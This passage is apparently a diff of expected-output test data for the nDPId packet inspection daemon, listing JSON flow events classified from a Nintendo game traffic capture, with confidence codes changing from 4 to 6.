+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1500731343274,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsAs38AAAAARQAAaBG2AAABEertwKgMclE9noraa8o5AFSchg=="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1500731343274,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsA7ykAAAAARQAAaBG3AAABEerswKgMclE9noraa8o5AFRg3A=="} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1500731340951,"flow_last_seen":1500731340966,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1500731340951,"flow_last_seen":1500731340966,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":160,"flow_first_seen":1500731343266,"flow_last_seen":1500731348756,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":45024,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":160,"flow_first_seen":1500731343266,"flow_last_seen":1500731348756,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":45024,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340941,"flow_last_seen":1500731340946,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340941,"flow_last_seen":1500731340946,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":200000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":200000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":157,"flow_first_seen":1500731343061,"flow_last_seen":1500731348745,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1212,"flow_tot_l4_payload_len":46764,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1500731323269,"flow_last_seen":1500731323270,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":157,"flow_first_seen":1500731343061,"flow_last_seen":1500731348745,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1212,"flow_tot_l4_payload_len":46764,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1500731323269,"flow_last_seen":1500731323270,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":200000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":200000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} 
-00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":447,"flow_first_seen":1500731342849,"flow_last_seen":1500731348749,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":168900,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 
-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1500731320644,"flow_last_seen":1500731325506,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":812,"flow_tot_l4_payload_len":4452,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1500731320774,"flow_last_seen":1500731322059,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1500731320764,"flow_last_seen":1500731321914,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1500731343274,"flow_last_seen":1500731343874,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731342860,"flow_last_seen":1500731343591,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":756,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} +00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":447,"flow_first_seen":1500731342849,"flow_last_seen":1500731348749,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":168900,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1500731320644,"flow_last_seen":1500731325506,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":812,"flow_tot_l4_payload_len":4452,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1500731320774,"flow_last_seen":1500731322059,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 